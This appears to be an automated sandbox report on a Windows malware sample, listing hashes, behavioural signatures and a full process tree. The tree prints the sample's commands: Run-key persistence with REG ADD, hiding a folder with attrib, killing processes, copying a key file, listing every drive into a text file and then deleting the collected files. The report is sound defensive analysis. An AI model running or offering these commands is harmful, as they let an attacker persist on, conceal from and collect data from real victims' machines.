Analysis
-
max time kernel
150s -
max time network
134s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 09:46
Static task
static1
Behavioral task
behavioral1
Sample
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe
Resource
win10v2004-20220901-en
General
-
Target
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe
-
Size
32KB
-
MD5
ebd4ff5dd3b586aa279899a33dbc093b
-
SHA1
f861dc94a155c8a3d7952c79eca146ef61123c39
-
SHA256
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e
-
SHA512
973561d45cc8e4b31a91f0daf4504f555b34c352fd0d26750b4e3693ee38161881908598e909beaf2c2616b394f2a9dbdf5091158ae7594c09448329ad96dcf6
-
SSDEEP
192:/Tmxc4FkYQPY7bKTpBVhUkEV/r0rwxk1VY+gkGG2KM/qqleJnJtM3gxU4kzk/xA0:/TAnuAApBVhUfo16oCGvjc8WlD94o6
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 12 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Run Time = "c:\\users\\public\\windows\\m.e.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Run Time2 = "c:\\users\\public\\windows\\dl.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Run Time = "c:\\users\\public\\windows\\m.e.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Run Time2 = "c:\\users\\public\\windows\\dl.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Run Time = "c:\\users\\public\\windows\\m.e.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Run Time2 = "c:\\users\\public\\windows\\dl.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4800 taskkill.exe 3516 taskkill.exe 1092 taskkill.exe 4832 taskkill.exe -
Processes:
explorer.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe -
Modifies registry class 20 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid process 4220 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
explorer.exepid process 4220 explorer.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 4800 taskkill.exe Token: SeDebugPrivilege 3516 taskkill.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 4832 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exeexplorer.exepid process 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe 4220 explorer.exe 4220 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4880 wrote to memory of 4616 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4616 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4616 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4616 wrote to memory of 4800 4616 cmd.exe taskkill.exe PID 4616 wrote to memory of 4800 4616 cmd.exe taskkill.exe PID 4616 wrote to memory of 4800 4616 cmd.exe taskkill.exe PID 4880 wrote to memory of 1420 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1420 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1420 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1704 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1704 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1704 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1784 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1784 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1784 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1576 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1576 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1576 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4060 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4060 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4060 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3556 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3556 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3556 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 1704 wrote to memory of 3756 1704 cmd.exe reg.exe PID 1704 wrote to memory of 3756 1704 cmd.exe reg.exe PID 1704 wrote to memory of 3756 1704 cmd.exe reg.exe PID 1420 wrote to memory of 4864 1420 cmd.exe explorer.exe PID 1420 wrote to memory of 4864 1420 cmd.exe explorer.exe PID 1420 wrote to memory of 4864 1420 cmd.exe explorer.exe PID 3556 wrote to memory of 3516 3556 cmd.exe taskkill.exe PID 3556 wrote to memory of 3516 3556 cmd.exe taskkill.exe PID 3556 wrote to memory of 3516 3556 cmd.exe taskkill.exe PID 1784 wrote to memory of 4092 1784 cmd.exe reg.exe PID 1784 wrote to memory of 4092 1784 cmd.exe reg.exe PID 1784 wrote to memory of 4092 1784 cmd.exe reg.exe PID 4880 wrote to memory of 2000 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 2000 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 2000 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 1576 wrote to memory of 2744 1576 cmd.exe attrib.exe PID 1576 wrote to memory of 2744 1576 cmd.exe attrib.exe PID 1576 wrote to memory of 2744 1576 cmd.exe attrib.exe PID 4880 wrote to memory of 3336 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3336 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3336 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4408 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4408 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4408 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1912 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1912 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 1912 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3308 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3308 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3308 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3752 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3752 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 3752 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 2308 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 2308 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 2308 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 564 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 564 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 564 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe PID 4880 wrote to memory of 4832 4880 688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe cmd.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 2744 attrib.exe 4600 attrib.exe 1520 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe"C:\Users\Admin\AppData\Local\Temp\688015ef6e32189888233cf986e72d26be26ec234836d839f0ed854387c50a5e.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im dl.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dl.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4800 -
C:\Windows\SysWOW64\cmd.execmd /c explorer C:\users\public\windows\dl.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\SysWOW64\explorer.exeexplorer C:\users\public\windows\dl.exe3⤵PID:4864
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f3⤵
- Adds Run key to start application
PID:4092 -
C:\Windows\SysWOW64\cmd.execmd /c attrib +h +r +s c:\Users\public\windows2⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s c:\Users\public\windows3⤵
- Views/modifies file attributes
PID:2744 -
C:\Windows\SysWOW64\cmd.execmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt2⤵PID:4060
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f3⤵
- Adds Run key to start application
PID:3756 -
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im file.sys2⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im file.sys3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3516 -
C:\Windows\SysWOW64\cmd.execmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe2⤵PID:2000
-
C:\Windows\SysWOW64\cmd.execmd /c dir C:\ > C:\users\public\windows\Att\abban.txt2⤵PID:3336
-
C:\Windows\SysWOW64\cmd.execmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4408
-
C:\Windows\SysWOW64\cmd.execmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1912
-
C:\Windows\SysWOW64\cmd.execmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3308
-
C:\Windows\SysWOW64\cmd.execmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2308
-
C:\Windows\SysWOW64\cmd.execmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:564
-
C:\Windows\SysWOW64\cmd.execmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4832
-
C:\Windows\SysWOW64\cmd.execmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4944
-
C:\Windows\SysWOW64\cmd.execmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3452
-
C:\Windows\SysWOW64\cmd.execmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4252
-
C:\Windows\SysWOW64\cmd.execmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3752
-
C:\Windows\SysWOW64\cmd.execmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1640
-
C:\Windows\SysWOW64\cmd.execmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4356
-
C:\Windows\SysWOW64\cmd.execmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4296
-
C:\Windows\SysWOW64\cmd.execmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2840
-
C:\Windows\SysWOW64\cmd.execmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1160
-
C:\Windows\SysWOW64\cmd.execmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3732
-
C:\Windows\SysWOW64\cmd.execmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:952
-
C:\Windows\SysWOW64\cmd.execmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2940
-
C:\Windows\SysWOW64\cmd.execmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2204
-
C:\Windows\SysWOW64\cmd.execmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2032
-
C:\Windows\SysWOW64\cmd.execmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3512
-
C:\Windows\SysWOW64\cmd.execmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2732
-
C:\Windows\SysWOW64\cmd.execmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt2⤵PID:1128
-
C:\Windows\SysWOW64\cmd.execmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2644
-
C:\Windows\SysWOW64\cmd.execmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:5056
-
C:\Windows\SysWOW64\cmd.execmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4396
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\pic.jpg2⤵PID:1736
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\log.txt2⤵PID:4832
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\key.txt2⤵PID:1688
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\abban.txt2⤵PID:1512
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f2⤵PID:4816
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f3⤵
- Adds Run key to start application
PID:1140 -
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f2⤵PID:4688
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time2" /t REG_SZ /d "c:\users\public\windows\dl.exe" /f3⤵
- Adds Run key to start application
PID:2824 -
C:\Windows\SysWOW64\cmd.execmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt2⤵PID:4064
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +h +r +s c:\Users\public\windows2⤵PID:4676
-
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s c:\Users\public\windows3⤵
- Views/modifies file attributes
PID:4600 -
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im file.sys2⤵PID:3644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im file.sys3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\SysWOW64\cmd.execmd /c if exist C:\users\public\windows\windows.exe explorer C:\users\public\windows\windows.exe2⤵PID:3312
-
C:\Windows\SysWOW64\cmd.execmd /c dir C:\ > C:\users\public\windows\Att\abban.txt2⤵PID:3488
-
C:\Windows\SysWOW64\cmd.execmd /c dir B:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1884
-
C:\Windows\SysWOW64\cmd.execmd /c dir D:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:384
-
C:\Windows\SysWOW64\cmd.execmd /c dir R:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2452
-
C:\Windows\SysWOW64\cmd.execmd /c dir Q:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4804
-
C:\Windows\SysWOW64\cmd.execmd /c dir G:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:952
-
C:\Windows\SysWOW64\cmd.execmd /c dir H:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3092
-
C:\Windows\SysWOW64\cmd.execmd /c dir A:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:564
-
C:\Windows\SysWOW64\cmd.execmd /c dir J:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2732
-
C:\Windows\SysWOW64\cmd.execmd /c dir I:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3832
-
C:\Windows\SysWOW64\cmd.execmd /c dir K:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4260
-
C:\Windows\SysWOW64\cmd.execmd /c dir N:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:884
-
C:\Windows\SysWOW64\cmd.execmd /c copy /y C:\users\public\windows\key.sys C:\users\public\windows\Att\key.txt2⤵PID:1552
-
C:\Windows\SysWOW64\cmd.execmd /c dir z:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2288
-
C:\Windows\SysWOW64\cmd.execmd /c dir Y:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:440
-
C:\Windows\SysWOW64\cmd.execmd /c dir X:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1128
-
C:\Windows\SysWOW64\cmd.execmd /c dir W:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:940
-
C:\Windows\SysWOW64\cmd.execmd /c dir V:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3448
-
C:\Windows\SysWOW64\cmd.execmd /c dir U:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1560
-
C:\Windows\SysWOW64\cmd.execmd /c dir T:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1420
-
C:\Windows\SysWOW64\cmd.execmd /c dir S:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1684
-
C:\Windows\SysWOW64\cmd.execmd /c dir E:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4288
-
C:\Windows\SysWOW64\cmd.execmd /c dir F:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:4796
-
C:\Windows\SysWOW64\cmd.execmd /c dir P:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1088
-
C:\Windows\SysWOW64\cmd.execmd /c dir O:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:1332
-
C:\Windows\SysWOW64\cmd.execmd /c dir M:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:3740
-
C:\Windows\SysWOW64\cmd.execmd /c dir L:\ >> C:\users\public\windows\Att\abban.txt2⤵PID:2600
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\pic.jpg2⤵PID:4312
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\log.txt2⤵PID:1380
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\key.txt2⤵PID:1864
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /q C:\users\public\windows\Att\abban.txt2⤵PID:2716
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f2⤵PID:1140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Run Time" /t REG_SZ /d "c:\users\public\windows\m.e.exe" /f3⤵
- Adds Run key to start application
PID:4292 -
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im file.sys2⤵PID:2336
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im file.sys3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832 -
C:\Windows\SysWOW64\cmd.execmd /c C:\users\public\windows\file.sys /stext C:\users\public\windows\Att\log.txt2⤵PID:4748
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +h +r +s c:\Users\public\windows2⤵PID:1324
-
